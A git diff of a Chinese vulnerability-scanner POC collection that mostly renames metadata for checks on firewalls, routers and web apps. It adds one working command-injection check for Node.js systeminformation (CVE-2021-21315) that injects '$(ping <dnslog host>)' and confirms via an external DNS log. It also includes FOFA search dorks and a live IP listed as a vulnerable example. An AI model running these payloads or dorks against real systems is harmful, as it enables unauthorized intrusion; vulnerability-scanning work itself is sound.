diff --git a/poc/MaiPu_迈普/File_Download_webui/__pycache__/poc.cpython-38.pyc b/poc/MaiPu_迈普/File_Download_webui/__pycache__/poc.cpython-38.pyc
new file mode 100644
index 0000000..42bd6d6
Binary files /dev/null and b/poc/MaiPu_迈普/File_Download_webui/__pycache__/poc.cpython-38.pyc differ
diff --git a/poc/MaiPu_迈普/File_Download_webui/poc.py b/poc/MaiPu_迈普/File_Download_webui/poc.py
index f7967d6..ce17d7e 100644
--- a/poc/MaiPu_迈普/File_Download_webui/poc.py
+++ b/poc/MaiPu_迈普/File_Download_webui/poc.py
@@ -18,7 +18,7 @@ class POC(POCBase):
""", # POC描述,写更新描述,没有就不写
"name" : "迈普 ISG1000安全网关 任意文件下载漏洞", # 漏洞名称
- "VulnID" : "Blen-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可
+ "VulnID" : "oFx-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可
"AppName" : "迈普 ISG1000安全网关", # 漏洞应用名称
"AppVersion" : "None", # 漏洞应用版本
"VulnDate" : "2021-06-09", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx
diff --git a/poc/MailGard_佑友/RCE_ping_FireWall/__pycache__/poc.cpython-38.pyc b/poc/MailGard_佑友/RCE_ping_FireWall/__pycache__/poc.cpython-38.pyc
new file mode 100644
index 0000000..4d5578c
Binary files /dev/null and b/poc/MailGard_佑友/RCE_ping_FireWall/__pycache__/poc.cpython-38.pyc differ
diff --git a/poc/MailGard_佑友/RCE_ping_FireWall/poc.py b/poc/MailGard_佑友/RCE_ping_FireWall/poc.py
index e8c57af..2f6cff2 100644
--- a/poc/MailGard_佑友/RCE_ping_FireWall/poc.py
+++ b/poc/MailGard_佑友/RCE_ping_FireWall/poc.py
@@ -18,7 +18,7 @@ class POC(POCBase):
""", # POC描述,写更新描述,没有就不写
"name" : "佑友防火墙 后台命令执行漏洞", # 漏洞名称
- "VulnID" : "Blen-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可
+ "VulnID" : "oFx-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可
"AppName" : "佑友防火墙", # 漏洞应用名称
"AppVersion" : "", # 漏洞应用版本
"VulnDate" : "2021-06-09", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx
diff --git a/poc/MailGard_佑友/Weak_Pass_FireWall/__pycache__/poc.cpython-38.pyc b/poc/MailGard_佑友/Weak_Pass_FireWall/__pycache__/poc.cpython-38.pyc
new file mode 100644
index 0000000..0508947
Binary files /dev/null and b/poc/MailGard_佑友/Weak_Pass_FireWall/__pycache__/poc.cpython-38.pyc differ
diff --git a/poc/MailGard_佑友/Weak_Pass_FireWall/poc.py b/poc/MailGard_佑友/Weak_Pass_FireWall/poc.py
index 20383ba..ad7cfbb 100644
--- a/poc/MailGard_佑友/Weak_Pass_FireWall/poc.py
+++ b/poc/MailGard_佑友/Weak_Pass_FireWall/poc.py
@@ -18,7 +18,7 @@ class POC(POCBase):
""", # POC描述,写更新描述,没有就不写
"name" : "佑友防火墙 弱口令", # 漏洞名称
- "VulnID" : "Blen-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可
+ "VulnID" : "oFx-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可
"AppName" : "佑友防火墙", # 漏洞应用名称
"AppVersion" : "", # 漏洞应用版本
"VulnDate" : "2021-06-09", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx
diff --git a/poc/MessageSolution/Info_Disclosure/__pycache__/poc.cpython-38.pyc b/poc/MessageSolution/Info_Disclosure/__pycache__/poc.cpython-38.pyc
new file mode 100644
index 0000000..81b1471
Binary files /dev/null and b/poc/MessageSolution/Info_Disclosure/__pycache__/poc.cpython-38.pyc differ
diff --git a/poc/Metabase/File_Read_CVE_2021_41277/__pycache__/poc.cpython-38.pyc b/poc/Metabase/File_Read_CVE_2021_41277/__pycache__/poc.cpython-38.pyc
new file mode 100644
index 0000000..42e14d4
Binary files /dev/null and b/poc/Metabase/File_Read_CVE_2021_41277/__pycache__/poc.cpython-38.pyc differ
diff --git a/poc/MicroSoft/RCE_CVE_2022_21907/__pycache__/poc.cpython-38.pyc b/poc/MicroSoft/RCE_CVE_2022_21907/__pycache__/poc.cpython-38.pyc
new file mode 100644
index 0000000..320c20f
Binary files /dev/null and b/poc/MicroSoft/RCE_CVE_2022_21907/__pycache__/poc.cpython-38.pyc differ
diff --git a/poc/MicroSoftRCE_CVE_2022_21907/poc.py b/poc/MicroSoft/RCE_CVE_2022_21907/poc.py
similarity index 98%
rename from poc/MicroSoftRCE_CVE_2022_21907/poc.py
rename to poc/MicroSoft/RCE_CVE_2022_21907/poc.py
index 446b9b2..fdcf415 100644
--- a/poc/MicroSoftRCE_CVE_2022_21907/poc.py
+++ b/poc/MicroSoft/RCE_CVE_2022_21907/poc.py
@@ -10,7 +10,7 @@ urllib3.disable_warnings()
class POC(POCBase):
_info = {
- "author" : "hansi", # POC作者
+ "author" : "jijue", # POC作者
"version" : "1", # POC版本,默认是1
"CreateDate" : "2022-01-01", # POC创建时间
"UpdateDate" : "2022-01-01", # POC创建时间
@@ -60,7 +60,9 @@ class POC(POCBase):
def _verify(self):
"""
返回vuln
+
存在漏洞:vuln = [True,html_source] # html_source就是页面源码
+
不存在漏洞:vuln = [False,""]
"""
vuln = [False,""]
diff --git a/poc/NSoft_新软/FileRead_EWEBS/__pycache__/poc.cpython-38.pyc b/poc/NSoft_新软/FileRead_EWEBS/__pycache__/poc.cpython-38.pyc
new file mode 100644
index 0000000..7138310
Binary files /dev/null and b/poc/NSoft_新软/FileRead_EWEBS/__pycache__/poc.cpython-38.pyc differ
diff --git a/poc/NatShell_蓝海卓越/File_Read/__pycache__/poc.cpython-38.pyc b/poc/NatShell_蓝海卓越/File_Read/__pycache__/poc.cpython-38.pyc
new file mode 100644
index 0000000..afb0468
Binary files /dev/null and b/poc/NatShell_蓝海卓越/File_Read/__pycache__/poc.cpython-38.pyc differ
diff --git a/poc/NatShell_蓝海卓越/HashInfo_DisClosure/__pycache__/poc.cpython-38.pyc b/poc/NatShell_蓝海卓越/HashInfo_DisClosure/__pycache__/poc.cpython-38.pyc
new file mode 100644
index 0000000..34f7529
Binary files /dev/null and b/poc/NatShell_蓝海卓越/HashInfo_DisClosure/__pycache__/poc.cpython-38.pyc differ
diff --git a/poc/NetPower_中科网威/UPInfo_DisClosure_Firewall/__pycache__/poc.cpython-38.pyc b/poc/NetPower_中科网威/UPInfo_DisClosure_Firewall/__pycache__/poc.cpython-38.pyc
new file mode 100644
index 0000000..39fc882
Binary files /dev/null and b/poc/NetPower_中科网威/UPInfo_DisClosure_Firewall/__pycache__/poc.cpython-38.pyc differ
diff --git a/poc/NetPower_中科网威/UPInfo_DisClosure_Firewall/poc.py b/poc/NetPower_中科网威/UPInfo_DisClosure_Firewall/poc.py
index 8274040..65bddd0 100644
--- a/poc/NetPower_中科网威/UPInfo_DisClosure_Firewall/poc.py
+++ b/poc/NetPower_中科网威/UPInfo_DisClosure_Firewall/poc.py
@@ -18,7 +18,7 @@ class POC(POCBase):
""", # POC描述,写更新描述,没有就不写
"name" : "中科网威 下一代防火墙控制系统 账号密码泄露漏洞", # 漏洞名称
- "VulnID" : "Blen-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可
+ "VulnID" : "oFx-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可
"AppName" : "中科网威 下一代防火墙控制系统", # 漏洞应用名称
"AppVersion" : "", # 漏洞应用版本
"VulnDate" : "2021-06-09", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx
diff --git a/poc/Node.js/Cmd_inj_CVE_2021_21315/__pycache__/poc.cpython-38.pyc b/poc/Node.js/Cmd_inj_CVE_2021_21315/__pycache__/poc.cpython-38.pyc
new file mode 100644
index 0000000..5dcc5c2
Binary files /dev/null and b/poc/Node.js/Cmd_inj_CVE_2021_21315/__pycache__/poc.cpython-38.pyc differ
diff --git a/poc/Node.js/Cmd_inj_CVE_2021_21315/poc.py b/poc/Node.js/Cmd_inj_CVE_2021_21315/poc.py
new file mode 100644
index 0000000..c4f8158
--- /dev/null
+++ b/poc/Node.js/Cmd_inj_CVE_2021_21315/poc.py
@@ -0,0 +1,87 @@
+# coding:utf-8
+import requests
+from lib.core.common import url_handle,get_random_ua,verify_ceye_dns,get_ceye_dns
+from lib.core.poc import POCBase
+# ...
+import urllib3
+urllib3.disable_warnings()
+
+class POC(POCBase):
+
+ _info = {
+ "author" : "jijue", # POC作者
+ "version" : "1", # POC版本,默认是1
+ "CreateDate" : "2021-06-09", # POC创建时间
+ "UpdateDate" : "2021-06-09", # POC创建时间
+ "PocDesc" : """
+ 略
+ """, # POC描述,写更新描述,没有就不写
+
+ "name" : "Node.js命令注入漏洞(CVE-2021-21315)", # 漏洞名称
+ "VulnID" : "CVE-2021-21315", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可
+ "AppName" : "Node.js", # 漏洞应用名称
+ "AppVersion" : "", # 漏洞应用版本
+ "VulnDate" : "2021-06-09", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx
+ "VulnDesc" : """
+ Node.js-systeminformation是用于获取各种系统信息的Node.JS模块,
+ 它包含多种轻量级功能,可以检索详细的硬件和系统相关信息。
+ 自发布至今,systeminformation软件包下载次数近3400万。
+
+ 2021年02月24日,npm团队发布安全公告,
+ Node.js库中的systeminformation软件包中存在一个命令注入漏洞(CVE-2021-21315),
+ 其CVSSv3评分为7.8。攻击者可以通过在未经过滤的参数中注入Payload来执行系统命令。
+
+ 目前该漏洞已经在5.3.1版本中修复。
+ """, # 漏洞简要描述
+
+ "fofa-dork":"""
+ app="Node.js"
+ """, # fofa搜索语句
+ "example" : "", # 存在漏洞的演示url,写一个就可以了
+ "exp_img" : "", # 先不管
+ }
+
+ def _verify(self):
+ """
+ 返回vuln
+
+ 存在漏洞:vuln = [True,html_source] # html_source就是页面源码
+
+ 不存在漏洞:vuln = [False,""]
+ """
+ vuln = [False,""]
+ success,dns_flag = get_ceye_dns()
+ if success == False:
+ return [False,dns_flag]
+
+ url = self.target + "/api/getServices?name[]=$({cmd})".format(cmd = "ping%20" + dns_flag) # url自己按需调整
+
+
+ headers = {"User-Agent":get_random_ua(),
+ "Connection":"close",
+ # "Content-Type": "application/x-www-form-urlencoded",
+ }
+
+ try:
+ """
+ 检测逻辑,漏洞存在则修改vuln值为True,漏洞不存在则不动
+ """
+ req = requests.get(url,headers = headers , proxies = self.proxy ,timeout = self.timeout,verify = False)
+ flager = verify_ceye_dns(dns_flag)
+ if flager == True:
+ vuln = [True,dns_flag]
+ elif flager == False:
+ vuln = [False,dns_flag]
+ else:
+ vuln = [False,flager]
+ except Exception as e:
+ raise e
+
+ # 以下逻辑酌情使用
+ if self._honeypot_check(vuln[1]) == True:
+ vuln[0] = False
+
+ return vuln
+
+ def _attack(self):
+ return self._verify()
\ No newline at end of file
diff --git a/poc/Node.js/Dir_Traversal_CVE_2017_14849/__pycache__/poc.cpython-38.pyc b/poc/Node.js/Dir_Traversal_CVE_2017_14849/__pycache__/poc.cpython-38.pyc
new file mode 100644
index 0000000..8dc5a13
Binary files /dev/null and b/poc/Node.js/Dir_Traversal_CVE_2017_14849/__pycache__/poc.cpython-38.pyc differ
diff --git a/poc/OKI/UnAuth_MC573/__pycache__/poc.cpython-38.pyc b/poc/OKI/UnAuth_MC573/__pycache__/poc.cpython-38.pyc
new file mode 100644
index 0000000..d159a2e
Binary files /dev/null and b/poc/OKI/UnAuth_MC573/__pycache__/poc.cpython-38.pyc differ
diff --git a/poc/MC573/MC573_Unauth_Access/poc.py b/poc/OKI/UnAuth_MC573/poc.py
similarity index 81%
rename from poc/MC573/MC573_Unauth_Access/poc.py
rename to poc/OKI/UnAuth_MC573/poc.py
index 05fbc8a..8fba0cb 100644
--- a/poc/MC573/MC573_Unauth_Access/poc.py
+++ b/poc/OKI/UnAuth_MC573/poc.py
@@ -9,25 +9,26 @@ urllib3.disable_warnings()
class POC(POCBase):
_info = {
- "author" : "hansi", # POC作者
+ "author" : "hansi && jijue", # POC作者
"version" : "1", # POC版本,默认是1
"CreateDate" : "2022-01-12", # POC创建时间
"UpdateDate" : "2022-01-12", # POC创建时间
"PocDesc" : """
- 略
+ v1:略
+ v2:优化了规则,降低误报率
""", # POC描述,写更新描述,没有就不写
- "name" : "MC573未授权访问", # 漏洞名称
+ "name" : "OKI MC573未授权访问", # 漏洞名称
"VulnID" : "", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可
- "AppName" : "MC573未授权访问", # 漏洞应用名称
+ "AppName" : "MC573", # 漏洞应用名称
"AppVersion" : "", # 漏洞应用版本
"VulnDate" : "2022-01-12", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx
"VulnDesc" : """
- IKO MC573打印机存在未授权访问漏洞,攻击者可以利用该漏洞访问敏感信息,执行敏感操作
+ OKI MC573打印机存在未授权访问漏洞,攻击者可以利用该漏洞访问敏感信息,执行敏感操作
""", # 漏洞简要描述
"fofa-dork":"""
- "MC573"
+ "MC573"
""", # fofa搜索语句
"example" : "", # 存在漏洞的演示url,写一个就可以了
"exp_img" : "", # 先不管
@@ -58,7 +59,7 @@ class POC(POCBase):
检测逻辑,漏洞存在则修改vuln值为True,漏洞不存在则不动
"""
req = requests.get(url,headers = headers , proxies = self.proxy ,timeout = self.timeout,verify = False)
- if req.status_code == 200 and "MC573" in req.text:
+ if req.status_code == 200 and "MC573" in req.text:
vuln = [True,req.text]
else:
vuln = [False,req.text]
diff --git a/poc/PHPStudy/Back_Door/__pycache__/poc.cpython-38.pyc b/poc/PHPStudy/Back_Door/__pycache__/poc.cpython-38.pyc
new file mode 100644
index 0000000..6c2d5c1
Binary files /dev/null and b/poc/PHPStudy/Back_Door/__pycache__/poc.cpython-38.pyc differ
diff --git a/poc/PHPStudy/Back_Door/poc.py b/poc/PHPStudy/Back_Door/poc.py
index 6160207..fb7408c 100644
--- a/poc/PHPStudy/Back_Door/poc.py
+++ b/poc/PHPStudy/Back_Door/poc.py
@@ -18,7 +18,7 @@ class POC(POCBase):
""", # POC描述,写更新描述,没有就不写
"name" : "PHPStudy 后门检测", # 漏洞名称
- "VulnID" : "Blen-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可
+ "VulnID" : "oFx-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可
"AppName" : "phpstudy", # 漏洞应用名称
"AppVersion" : "phpStudy2016和phpStudy2018自带的php-5.2.17、php-5.4.45", # 漏洞应用版本
"VulnDate" : "2021-06-09", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx
diff --git a/poc/PHPUnit/RCE_eval_stdin/__pycache__/poc.cpython-38.pyc b/poc/PHPUnit/RCE_eval_stdin/__pycache__/poc.cpython-38.pyc
new file mode 100644
index 0000000..fdb987c
Binary files /dev/null and b/poc/PHPUnit/RCE_eval_stdin/__pycache__/poc.cpython-38.pyc differ
diff --git a/poc/PearProject_梨子项目管理系统/Conf_Info_Disclosure_env/__pycache__/poc.cpython-38.pyc b/poc/PearProject_梨子项目管理系统/Conf_Info_Disclosure_env/__pycache__/poc.cpython-38.pyc
new file mode 100644
index 0000000..eaa22a0
Binary files /dev/null and b/poc/PearProject_梨子项目管理系统/Conf_Info_Disclosure_env/__pycache__/poc.cpython-38.pyc differ
diff --git a/poc/QZSec_齐治/AnyUser_Login_Fortress_Machine/__pycache__/poc.cpython-38.pyc b/poc/QZSec_齐治/AnyUser_Login_Fortress_Machine/__pycache__/poc.cpython-38.pyc
new file mode 100644
index 0000000..bd69006
Binary files /dev/null and b/poc/QZSec_齐治/AnyUser_Login_Fortress_Machine/__pycache__/poc.cpython-38.pyc differ
diff --git a/poc/QZSec_齐治/QZSec_齐治AnyUser_Login_Fortress_Machine/poc.py b/poc/QZSec_齐治/AnyUser_Login_Fortress_Machine/poc.py
similarity index 99%
rename from poc/QZSec_齐治/QZSec_齐治AnyUser_Login_Fortress_Machine/poc.py
rename to poc/QZSec_齐治/AnyUser_Login_Fortress_Machine/poc.py
index 32eb643..b7aab1d 100644
--- a/poc/QZSec_齐治/QZSec_齐治AnyUser_Login_Fortress_Machine/poc.py
+++ b/poc/QZSec_齐治/AnyUser_Login_Fortress_Machine/poc.py
@@ -36,7 +36,9 @@ class POC(POCBase):
def _verify(self):
"""
返回vuln
+
存在漏洞:vuln = [True,html_source] # html_source就是页面源码
+
不存在漏洞:vuln = [False,""]
"""
vuln = [False,""]
diff --git a/poc/Redis/Unauth_Access/__pycache__/poc.cpython-38.pyc b/poc/Redis/Unauth_Access/__pycache__/poc.cpython-38.pyc
new file mode 100644
index 0000000..c02f5ab
Binary files /dev/null and b/poc/Redis/Unauth_Access/__pycache__/poc.cpython-38.pyc differ
diff --git a/poc/Ruijie_锐捷/Dir_List_Cloud_ClassRoom/__pycache__/poc.cpython-38.pyc b/poc/Ruijie_锐捷/Dir_List_Cloud_ClassRoom/__pycache__/poc.cpython-38.pyc
new file mode 100644
index 0000000..5ccbb50
Binary files /dev/null and b/poc/Ruijie_锐捷/Dir_List_Cloud_ClassRoom/__pycache__/poc.cpython-38.pyc differ
diff --git a/poc/Ruijie_锐捷/Dir_List_Cloud_ClassRoom/poc.py b/poc/Ruijie_锐捷/Dir_List_Cloud_ClassRoom/poc.py
index 7780c58..467d133 100644
--- a/poc/Ruijie_锐捷/Dir_List_Cloud_ClassRoom/poc.py
+++ b/poc/Ruijie_锐捷/Dir_List_Cloud_ClassRoom/poc.py
@@ -18,7 +18,7 @@ class POC(POCBase):
""", # POC描述,写更新描述,没有就不写
"name" : "锐捷云课堂主机 目录遍历漏洞", # 漏洞名称
- "VulnID" : "Blen-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可
+ "VulnID" : "oFx-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可
"AppName" : "锐捷云课堂", # 漏洞应用名称
"AppVersion" : "", # 漏洞应用版本
"VulnDate" : "2021-06-09", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx
diff --git a/poc/Ruijie_锐捷/File_Read_EG_userAuth/__pycache__/poc.cpython-38.pyc b/poc/Ruijie_锐捷/File_Read_EG_userAuth/__pycache__/poc.cpython-38.pyc
new file mode 100644
index 0000000..98dbf9d
Binary files /dev/null and b/poc/Ruijie_锐捷/File_Read_EG_userAuth/__pycache__/poc.cpython-38.pyc differ
diff --git a/poc/Ruijie_锐捷/File_Read_EG_userAuth/poc.py b/poc/Ruijie_锐捷/File_Read_EG_userAuth/poc.py
index 4441b2c..d6e9b3b 100644
--- a/poc/Ruijie_锐捷/File_Read_EG_userAuth/poc.py
+++ b/poc/Ruijie_锐捷/File_Read_EG_userAuth/poc.py
@@ -18,7 +18,7 @@ class POC(POCBase):
""", # POC描述,写更新描述,没有就不写
"name" : "锐捷EG网关 userAuth.php存在任意文件读取漏洞", # 漏洞名称
- "VulnID" : "Blen-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可
+ "VulnID" : "oFx-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可
"AppName" : "锐捷EG网关", # 漏洞应用名称
"AppVersion" : "", # 漏洞应用版本
"VulnDate" : "2021-06-09", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx
diff --git a/poc/Ruijie_锐捷/RCE_EWEB_Manager_CNVD_2021_09650/__pycache__/poc.cpython-38.pyc b/poc/Ruijie_锐捷/RCE_EWEB_Manager_CNVD_2021_09650/__pycache__/poc.cpython-38.pyc
new file mode 100644
index 0000000..26627c2
Binary files /dev/null and b/poc/Ruijie_锐捷/RCE_EWEB_Manager_CNVD_2021_09650/__pycache__/poc.cpython-38.pyc differ
diff --git a/poc/Ruijie_锐捷/RCE_NBR_1300G/__pycache__/poc.cpython-38.pyc b/poc/Ruijie_锐捷/RCE_NBR_1300G/__pycache__/poc.cpython-38.pyc
new file mode 100644
index 0000000..dd386ac
Binary files /dev/null and b/poc/Ruijie_锐捷/RCE_NBR_1300G/__pycache__/poc.cpython-38.pyc differ
diff --git a/poc/Ruijie_锐捷/RCE_NBR_1300G/poc.py b/poc/Ruijie_锐捷/RCE_NBR_1300G/poc.py
index 4cf1f94..4759da0 100644
--- a/poc/Ruijie_锐捷/RCE_NBR_1300G/poc.py
+++ b/poc/Ruijie_锐捷/RCE_NBR_1300G/poc.py
@@ -19,7 +19,7 @@ class POC(POCBase):
""", # POC描述,写更新描述,没有就不写
"name" : "锐捷NBR 1300G 路由器 越权CLI命令执行漏洞", # 漏洞名称
- "VulnID" : "Blen-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可
+ "VulnID" : "oFx-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可
"AppName" : "锐捷NBRNBR1300G 路由器", # 漏洞应用名称
"AppVersion" : "", # 漏洞应用版本
"VulnDate" : "2021-06-09", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx
diff --git a/poc/Ruijie_锐捷/RCE_SmartWeb_WEB_VMS/__pycache__/poc.cpython-38.pyc b/poc/Ruijie_锐捷/RCE_SmartWeb_WEB_VMS/__pycache__/poc.cpython-38.pyc
new file mode 100644
index 0000000..7509887
Binary files /dev/null and b/poc/Ruijie_锐捷/RCE_SmartWeb_WEB_VMS/__pycache__/poc.cpython-38.pyc differ
diff --git a/poc/Ruijie_锐捷/RCE_SmartWeb_WEB_VMS/poc.py b/poc/Ruijie_锐捷/RCE_SmartWeb_WEB_VMS/poc.py
index e068eb9..e9703fd 100644
--- a/poc/Ruijie_锐捷/RCE_SmartWeb_WEB_VMS/poc.py
+++ b/poc/Ruijie_锐捷/RCE_SmartWeb_WEB_VMS/poc.py
@@ -18,7 +18,7 @@ class POC(POCBase):
""", # POC描述,写更新描述,没有就不写
"name" : "锐捷Smartweb管理系统 默认账户➕命令执行漏洞", # 漏洞名称
- "VulnID" : "Blen-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可
+ "VulnID" : "oFx-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可
"AppName" : "锐捷网络股份有限公司 无线smartweb管理系统", # 漏洞应用名称
"AppVersion" : "", # 漏洞应用版本
"VulnDate" : "2021-06-09", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx
diff --git a/poc/Ruijie_锐捷/UPInfo_DisClosure_RG_UAC_CNVD_2021_14536/__pycache__/poc.cpython-38.pyc b/poc/Ruijie_锐捷/UPInfo_DisClosure_RG_UAC_CNVD_2021_14536/__pycache__/poc.cpython-38.pyc
new file mode 100644
index 0000000..1f2ca1f
Binary files /dev/null and b/poc/Ruijie_锐捷/UPInfo_DisClosure_RG_UAC_CNVD_2021_14536/__pycache__/poc.cpython-38.pyc differ
diff --git a/poc/RuoYi_若依/Weak_Pass/__pycache__/poc.cpython-38.pyc b/poc/RuoYi_若依/Weak_Pass/__pycache__/poc.cpython-38.pyc
new file mode 100644
index 0000000..5630e5c
Binary files /dev/null and b/poc/RuoYi_若依/Weak_Pass/__pycache__/poc.cpython-38.pyc differ
diff --git a/poc/RuoYi_若依/Weak_Pass/poc.py b/poc/RuoYi_若依/Weak_Pass/poc.py
index 236abf9..fe79766 100644
--- a/poc/RuoYi_若依/Weak_Pass/poc.py
+++ b/poc/RuoYi_若依/Weak_Pass/poc.py
@@ -18,7 +18,7 @@ class POC(POCBase):
""", # POC描述,写更新描述,没有就不写
"name" : "若依后台管理系统 弱口令", # 漏洞名称
- "VulnID" : "Blen-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可
+ "VulnID" : "oFx-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可
"AppName" : "若依后台管理系统", # 漏洞应用名称
"AppVersion" : "", # 漏洞应用版本
"VulnDate" : "2021-06-09", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx
diff --git a/poc/SANGFOR_深信服/RCE_2020_EDR/__pycache__/poc.cpython-38.pyc b/poc/SANGFOR_深信服/RCE_2020_EDR/__pycache__/poc.cpython-38.pyc
new file mode 100644
index 0000000..c70216a
Binary files /dev/null and b/poc/SANGFOR_深信服/RCE_2020_EDR/__pycache__/poc.cpython-38.pyc differ
diff --git a/poc/SANGFOR_深信服RCE_2020_EDR/poc.py b/poc/SANGFOR_深信服/RCE_2020_EDR/poc.py
similarity index 97%
rename from poc/SANGFOR_深信服RCE_2020_EDR/poc.py
rename to poc/SANGFOR_深信服/RCE_2020_EDR/poc.py
index 14d33ec..9acb2d7 100644
--- a/poc/SANGFOR_深信服RCE_2020_EDR/poc.py
+++ b/poc/SANGFOR_深信服/RCE_2020_EDR/poc.py
@@ -10,7 +10,7 @@ urllib3.disable_warnings()
class POC(POCBase):
_info = {
- "author" : " ", # POC作者
+ "author" : "jijue", # POC作者
"version" : "1", # POC版本,默认是1
"CreateDate" : "2022-01-01", # POC创建时间
"UpdateDate" : "2022-01-01", # POC创建时间
@@ -37,7 +37,9 @@ class POC(POCBase):
def _verify(self):
"""
返回vuln
+
存在漏洞:vuln = [True,html_source] # html_source就是页面源码
+
不存在漏洞:vuln = [False,""]
"""
vuln = [False,""]
diff --git a/poc/Samsung/Lfi_Samsung_Wlan_AP/__pycache__/poc.cpython-38.pyc b/poc/Samsung/Lfi_Samsung_Wlan_AP/__pycache__/poc.cpython-38.pyc
new file mode 100644
index 0000000..b259b7b
Binary files /dev/null and b/poc/Samsung/Lfi_Samsung_Wlan_AP/__pycache__/poc.cpython-38.pyc differ
diff --git a/poc/Samsung/RCE_Samsung_WLANAP_WEA453e/__pycache__/poc.cpython-38.pyc b/poc/Samsung/RCE_Samsung_WLANAP_WEA453e/__pycache__/poc.cpython-38.pyc
new file mode 100644
index 0000000..90076e7
Binary files /dev/null and b/poc/Samsung/RCE_Samsung_WLANAP_WEA453e/__pycache__/poc.cpython-38.pyc differ
diff --git a/poc/Samsung/RCE_Samsung_WLANAP_WEA453e/poc.py b/poc/Samsung/RCE_Samsung_WLANAP_WEA453e/poc.py
index d2ad2fd..23e7ed3 100644
--- a/poc/Samsung/RCE_Samsung_WLANAP_WEA453e/poc.py
+++ b/poc/Samsung/RCE_Samsung_WLANAP_WEA453e/poc.py
@@ -18,7 +18,7 @@ class POC(POCBase):
""", # POC描述,写更新描述,没有就不写
"name" : "三星 WLAN AP WEA453e路由器 远程命令执行漏洞", # 漏洞名称
- "VulnID" : "Blen-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可
+ "VulnID" : "oFx-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可
"AppName" : "三星 WLAN AP WEA453e路由器", # 漏洞应用名称
"AppVersion" : "", # 漏洞应用版本
"VulnDate" : "2021-06-09", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx
diff --git a/poc/Sapido/RCE_BRC70n_Router/__pycache__/poc.cpython-38.pyc b/poc/Sapido/RCE_BRC70n_Router/__pycache__/poc.cpython-38.pyc
new file mode 100644
index 0000000..7303e00
Binary files /dev/null and b/poc/Sapido/RCE_BRC70n_Router/__pycache__/poc.cpython-38.pyc differ
diff --git a/poc/Sapido/Rce_sapido_BRC70n/poc.py b/poc/Sapido/RCE_BRC70n_Router/poc.py
similarity index 81%
rename from poc/Sapido/Rce_sapido_BRC70n/poc.py
rename to poc/Sapido/RCE_BRC70n_Router/poc.py
index 0a1036d..c31e7d9 100644
--- a/poc/Sapido/Rce_sapido_BRC70n/poc.py
+++ b/poc/Sapido/RCE_BRC70n_Router/poc.py
@@ -4,30 +4,37 @@ from lib.core.common import url_handle,get_random_ua
from lib.core.poc import POCBase
# ...
import urllib3
+import re
urllib3.disable_warnings()
class POC(POCBase):
_info = {
- "author" : "hansi", # POC作者
+ "author" : "hansi && jijue", # POC作者
"version" : "1", # POC版本,默认是1
"CreateDate" : "2022-01-10", # POC创建时间
"UpdateDate" : "2022-01-10", # POC创建时间
"PocDesc" : """
- 略
+ v1:略
+ v2:该版本对输出做了一定的优化,更简洁
""", # POC描述,写更新描述,没有就不写
- "name" : "sapido BRC70n路由器远程代码执行漏洞", # 漏洞名称
+ "name" : "Sapido BRC70n路由器远程代码执行漏洞", # 漏洞名称
"VulnID" : "", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可
"AppName" : "", # 漏洞应用名称
- "AppVersion" : "BR270n-v2.1.03,BRC76n-v2.1.03,GR297-v2.1.3,RB1732-v2.0.43", # 漏洞应用版本
+ "AppVersion" : """
+ BR270n-v2.1.03,
+ BRC76n-v2.1.03,
+ GR297-v2.1.3,
+ RB1732-v2.0.43
+ """, # 漏洞应用版本
"VulnDate" : "2022-01-10", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx
"VulnDesc" : """
""", # 漏洞简要描述
"fofa-dork":"""
- app="sapido-路由器"
+ app="sapido-路由器"
""", # fofa搜索语句
"example" : "http://122.116.238.251:1080", # 存在漏洞的演示url,写一个就可以了
"exp_img" : "", # 先不管
@@ -55,7 +62,10 @@ class POC(POCBase):
"""
